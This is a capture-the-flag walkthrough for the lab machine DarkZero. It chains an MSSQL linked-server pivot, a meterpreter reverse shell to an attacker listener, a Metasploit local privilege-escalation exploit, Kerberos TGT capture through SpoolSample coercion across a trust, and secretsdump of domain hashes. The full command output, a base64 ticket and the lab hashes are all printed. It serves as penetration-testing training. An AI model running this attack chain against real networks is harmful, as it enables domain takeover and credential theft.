DarkZero

As is common in real life pentests, you will start the DarkZero box with credentials for the following account john.w / RFulUtONCOL!

User

Use of MSSQL Linked Servers to gain user access to DC02.darkzero.ext from DC01.darkzero.htb

impacket-mssqlclient john.w@DC01.darkzero.htb -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (darkzero\john.w  guest@master)> enum_links
SRV_NAME            SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE      SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
-----------------   ----------------   -----------   -----------------   ------------------   ------------   -------   
DC01                SQLNCLI            SQL Server    DC01                NULL                 NULL           NULL      

DC02.darkzero.ext   SQLNCLI            SQL Server    DC02.darkzero.ext   NULL                 NULL           NULL      

useLinked Server       Local Login       Is Self Mapping   Remote Login   
-----------------   ---------------   ---------------   ------------   
DC02.darkzero.ext   darkzero\john.w                 0   dc01_sql_svc

Using a meterpreter payload from revshells.com, we can get a session on metasploit.

We can proceed to enumerate all possible windows exploits using exploit suggester, and obtain a SYSTEM shell on DC02

msf6 exploit(windows/local/cve_2024_30088_authz_basep) > run
[*] Started reverse TCP handler on 10.10.16.20:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[*] Reflectively injecting the DLL into 6176...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 608
[+] Successfully retrieved winlogon pid: 612
[*] Sending stage (203846 bytes) to 10.10.11.89
[*] Meterpreter session 3 opened (10.10.16.20:4444 -> 10.10.11.89:60473) at 2025-10-06 05:53:58 +0800

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:43e27ea2be22babce4fbcff3bc409a9d:::
svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:663a13eb19800202721db4225eadc38e:::
darkzero$:1105:aad3b435b51404eeaad3b435b51404ee:4276fdf209008f4988fa8c33d65a2f94:::
meterpreter > help

Root

Enumerating trust relationships with poweview.py, we see the following trust attributes

╭─LDAPS─[DC01.darkzero.htb]─[darkzero-ext\Administrator]-[NS:<auto>] [CACHED]
╰─PV ❯ Get-NetTrust
objectClass                   : top
                                leaf
                                trustedDomain
whenCreated                   : 29/07/2025 15:30:19 (2 months, 6 days ago)
whenChanged                   : 29/09/2025 18:25:18 (6 days ago)
name                          : darkzero.ext
objectGUID                    : {dc96b90d-8181-4c7f-90df-54b9814a8c06}
securityIdentifier            : S-1-5-21-1969715525-31638512-2552845157
trustDirection                : INBOUND
                                OUTBOUND
                                BIDIRECTIONAL
trustPartner                  : darkzero.ext
trustType                     : WINDOWS_ACTIVE_DIRECTORY
                                MIT
trustAttributes               : FOREST_TRANSITIVE
                                CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION
flatName                      : darkzero-ext
msDS-TrustForestTrustInfo     : S-1-5-21-1969715525-31638512-2552845157

We see the ENABLE_TGT_DELEGATION flag being set. Using DC02 to monitor for incoming authentication requests, we can coerce authentication from DC01.

./r.exe monitor /interval:5 /nowrap
PS C:\Users\Public> ./r.exe monitor /interval:5 /nowrap

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 

[*] Action: TGT Monitoring
[*] Monitoring every 5 seconds for new TGTs
<snip>
[*] 10/5/2025 11:25:25 PM UTC - Found new TGT:

  User                  :  DC01$@DARKZERO.HTB
  StartTime             :  10/5/2025 2:06:22 PM
  EndTime               :  10/6/2025 12:06:20 AM
  RenewTill             :  10/12/2025 2:06:20 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDZT3UFtLPB4JgC3QH2e6BZFq9xYVoXdyrFoFkKLuox3JwDHDPB/3la8Z+5ZmEqHJWASBeuhMlog5zmxAwSTk8CDMyaHqH4FDRYaffJsvzZg9PG6oCh4XL/70vz7b5u/kRn9I93dPD5FH6X2yxW5FE31mQQPpIbrY7Zk4y702jwZJdbyT6SMkSa5JQTSE0CLwK6eFp6UI3nCsu+mK8KlQcy60ZVTF7OWWXdiQU2cVhOWF0LVEPQkRDDX4S6Ykx8lgIIlv7+ALJdxV+2mSaqyBxpwM6p/PjD6D6R7kVHPRczbHG/ncZi+a1bhMCDS01p4/JWot5+XypHIoccep7cd8VHY/Uz0KR+egMHMXp3mqNQ0Ka8aJvlP2wuXOK5hj5SKXotYODfwxs1YTcFeaSZ5oFE/oao7R/ZebTgNZCX+RUPOedXOfjjXIM5gXODRZi0PgbdriR7Cpt0NVoRUhlNgDvHsKOB4FPZDv5Qlo42CquJNPztDzYjzQo04lk+8J74UYmSFaPxwY0pDbV7p1CSr69D8BnrIa8oTId7ceInGae1A13vAgrbcAEDqU8FJ2Oc52Tm5bEQTvB6dqZWNMuwtKX7mEqAgiRKTEs4YuCFWJGD8QfNaKYHOhOuv4ZWFXqT72u9Xl9eiaxCoPYh4pBQ2quBL7OzGFQJ+LyRgLCtOeH323CQq49xrqge5CQKoYgiyy0UZoP8dOo03fHYv5x1WZCJk7Bgs3EoJnYoKXjK7OKgTT4slpG53j/7jV94Yv8p8ZGWnmkV9UTRf1CzpmcLkUDIzHAuQfBBJBt8hQsMEvM7uA56H8AnbcmjiW6E6Tlw68rQQGAbNzen/570JoJn7OekwkHWVijvQ1FKu0PDipnD+GB2s64tkmHh9S+Wr5khE6Kyh+gRd9ReRMD1rC4VE80PVRxDO4DzDgjPaFckl0xvVCR/ehpXc2YPh1wjNyjlU1/FG9V1XaY8mTQ5FzZxxvEYl5q2s/T3sl5opGssVvx1/32sLiCh0h/Uxgqe2HNT/sX9CdNhnd9tukWwql4H6QzzNnj6eAM8Tl1rKKCvTkoYN3tdrM/kpCbIazUN5jeVS7ZYijjlkLaL6Pz2LBWdKzIlrW1U/ORWp1rwhqhnHW6erd/Z7IhE3cFX5rjUhTlLnbYjAtZkwWzid7n6QNAoxoHMcwBQv8bAtr5en1c1C4YRe8LfJzXHLgeLth3/CccTnT3NSqWywdNbaSxnmNPoBLzk6oCZBYk0VSUr842X6DJ5viBIS3x9T7tfhtPsFXVUfcw9pxtT/mVSWvJcxFYOSRHWBrkW/EOysq1cY9brLMqgzjMWkMGaDTw7HWz1rqMjDPr7FjLFfEdRBNAVeCDPWeqGpeM9ESCPKoOmd/gjARBeMxuQTJ32O/j78J0AhYDLe2Vyv7KLRZRfPMIFZS5I2Lq98nLVIWWeao4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQg/9QHbWsj0SaSchM/AMma5dadsamgnvAZzGeId1GnyNehDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDUyMTA2MjJaphEYDzIwMjUxMDA2MDcwNjIwWqcRGA8yMDI1MTAxMjIxMDYyMFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=

[*] Ticket cache size: 9




## On another Terminal
./SpoolSample.exe DC01.darkzero.htb DC02.darkzero.ext

We can then use ticketConverter for interoperatibility between .kirbi and .ccache

 echo "doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDZT3UFtLPB4JgC3QH2e6BZFq9xYVoXdyrFoFkKLuox3JwDHDPB/3la8Z+5ZmEqHJWASBeuhMlog5zmxAwSTk8CDMyaHqH4FDRYaffJsvzZg9PG6oCh4XL/70vz7b5u/kRn9I93dPD5FH6X2yxW5FE31mQQPpIbrY7Zk4y702jwZJdbyT6SMkSa5JQTSE0CLwK6eFp6UI3nCsu+mK8KlQcy60ZVTF7OWWXdiQU2cVhOWF0LVEPQkRDDX4S6Ykx8lgIIlv7+ALJdxV+2mSaqyBxpwM6p/PjD6D6R7kVHPRczbHG/ncZi+a1bhMCDS01p4/JWot5+XypHIoccep7cd8VHY/Uz0KR+egMHMXp3mqNQ0Ka8aJvlP2wuXOK5hj5SKXotYODfwxs1YTcFeaSZ5oFE/oao7R/ZebTgNZCX+RUPOedXOfjjXIM5gXODRZi0PgbdriR7Cpt0NVoRUhlNgDvHsKOB4FPZDv5Qlo42CquJNPztDzYjzQo04lk+8J74UYmSFaPxwY0pDbV7p1CSr69D8BnrIa8oTId7ceInGae1A13vAgrbcAEDqU8FJ2Oc52Tm5bEQTvB6dqZWNMuwtKX7mEqAgiRKTEs4YuCFWJGD8QfNaKYHOhOuv4ZWFXqT72u9Xl9eiaxCoPYh4pBQ2quBL7OzGFQJ+LyRgLCtOeH323CQq49xrqge5CQKoYgiyy0UZoP8dOo03fHYv5x1WZCJk7Bgs3EoJnYoKXjK7OKgTT4slpG53j/7jV94Yv8p8ZGWnmkV9UTRf1CzpmcLkUDIzHAuQfBBJBt8hQsMEvM7uA56H8AnbcmjiW6E6Tlw68rQQGAbNzen/570JoJn7OekwkHWVijvQ1FKu0PDipnD+GB2s64tkmHh9S+Wr5khE6Kyh+gRd9ReRMD1rC4VE80PVRxDO4DzDgjPaFckl0xvVCR/ehpXc2YPh1wjNyjlU1/FG9V1XaY8mTQ5FzZxxvEYl5q2s/T3sl5opGssVvx1/32sLiCh0h/Uxgqe2HNT/sX9CdNhnd9tukWwql4H6QzzNnj6eAM8Tl1rKKCvTkoYN3tdrM/kpCbIazUN5jeVS7ZYijjlkLaL6Pz2LBWdKzIlrW1U/ORWp1rwhqhnHW6erd/Z7IhE3cFX5rjUhTlLnbYjAtZkwWzid7n6QNAoxoHMcwBQv8bAtr5en1c1C4YRe8LfJzXHLgeLth3/CccTnT3NSqWywdNbaSxnmNPoBLzk6oCZBYk0VSUr842X6DJ5viBIS3x9T7tfhtPsFXVUfcw9pxtT/mVSWvJcxFYOSRHWBrkW/EOysq1cY9brLMqgzjMWkMGaDTw7HWz1rqMjDPr7FjLFfEdRBNAVeCDPWeqGpeM9ESCPKoOmd/gjARBeMxuQTJ32O/j78J0AhYDLe2Vyv7KLRZRfPMIFZS5I2Lq98nLVIWWeao4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQg/9QHbWsj0SaSchM/AMma5dadsamgnvAZzGeId1GnyNehDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDUyMTA2MjJaphEYDzIwMjUxMDA2MDcwNjIwWqcRGA8yMDI1MTAxMjIxMDYyMFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=" | base64 -d > dc01.kirbi
 
impacket-ticketConverter dc01.kirbi dc01.ccache    
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done


impacket-secretsdump 'DC01$'@DC01.darkzero.htb -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets

Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:64f4771e4c60b8b176c3769300f6f3f7:::
john.w:2603:aad3b435b51404eeaad3b435b51404ee:44b1b5623a1446b5831a7b3a4be3977b:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d02e3fe0986e9b5f013dad12b2350b3a:::
darkzero-ext$:2602:aad3b435b51404eeaad3b435b51404ee:95e4ba6219aced32642afa4661781d4b:::
[*] Kerberos keys grabbed
Administrator:0x14:2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
Administrator:0x13:a23315d970fe9d556be03ab611730673
Administrator:aes256-cts-hmac-sha1-96:d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
Administrator:aes128-cts-hmac-sha1-96:b1e04b87abab7be2c600fc652ac84362
Administrator:0x17:5917507bdf2ef2c2b0a869a1cba40726
krbtgt:aes256-cts-hmac-sha1-96:6330aee12ac37e9c42bc9af3f1fec55d7755c31d70095ca1927458d216884d41
krbtgt:aes128-cts-hmac-sha1-96:0ffbe626519980a499cb85b30e0b80f3
krbtgt:0x17:64f4771e4c60b8b176c3769300f6f3f7
john.w:0x14:f6d74915f051ef9c1c085d31f02698c04a4c6804d509b7c4442e8593d6d957ea
john.w:0x13:7b145a89aed458eaea530a2bd1eb93bd
john.w:aes256-cts-hmac-sha1-96:49a6d3404e9d19859c0eea1036f6e95debbdea99efea4e2c11ee529add37717e
john.w:aes128-cts-hmac-sha1-96:87d9cbd84d85c50904eba39d588e47db
john.w:0x17:44b1b5623a1446b5831a7b3a4be3977b
DC01$:aes256-cts-hmac-sha1-96:25e1e7b4219c9b414726983f0f50bbf28daa11dd4a24eed82c451c4d763c9941
DC01$:aes128-cts-hmac-sha1-96:9996363bffe713a6777597c876d4f9db
DC01$:0x17:d02e3fe0986e9b5f013dad12b2350b3a
darkzero-ext$:aes256-cts-hmac-sha1-96:eec6ace095e0f3b33a9714c2a23b19924542ba13a3268ea6831410020e1c11f3
darkzero-ext$:aes128-cts-hmac-sha1-96:3efb8a66f0a09fbc6602e46f22e8fc1c
darkzero-ext$:0x17:95e4ba6219aced32642afa4661781d4b
[*] Cleaning up...

evil-winrm to get the flag

*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         10/5/2025   2:06 PM             34 root.txt
-ar---         10/5/2025   2:06 PM             34 user.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type *
ca2f5f1a32<snip>
82db32d8<snip>

PreviousRebound NextCTF Writeups

Last updated 1 day ago

hashtagUser

hashtagRoot

User

Root